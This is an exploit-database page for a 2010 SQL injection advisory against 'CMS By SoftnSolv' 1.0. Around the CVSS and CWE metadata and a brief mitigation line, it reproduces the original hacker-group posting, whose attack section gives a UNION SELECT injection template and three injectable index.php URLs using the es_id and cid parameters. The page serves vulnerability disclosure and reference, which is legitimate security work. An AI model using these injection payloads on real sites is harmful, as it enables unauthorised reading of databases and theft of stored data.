header-logo
Suggest Exploit
vendor:
CMS By SoftnSolv
by:
Th3 RDX
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CMS By SoftnSolv
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:softnsolv:cms_by_softnsolv
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

CMS By SoftnSolv (index.php) SQL Injection Vulnerable

CMS By SoftnSolv (index.php) is vulnerable to SQL Injection. An attacker can inject malicious SQL code into the 'es_id', 'cid' and 'es_id' parameters of the index.php file to gain access to the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: CMS By SoftnSolv (index.php) SQL Injection Vulnerable
# Date: 24-03-2010
# Author: Th3 RDX
# Software Link:
# Version: 1.0
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Sp3c1al Th4nkz to : R00T and R45C4L
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

CMS By SoftnSolv (index.php) SQL Injection Vulnerable

----- [ Vendor ] -----

http://www.softnsolv.com/

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code

{e.g = 45+and+1=0++Union+Select+UNHEX(HEX([visible])) ,2 (tables & column) }

[SQLi] http://server/cms/index.php?es_id=44[CODE]

[SQLi] http://server/cms/index.php?cid=45[CODE]

[SQLi] http://server/cms/index.php?es_id=46[CODE]


%\\
##############################################################################



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 24 March 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=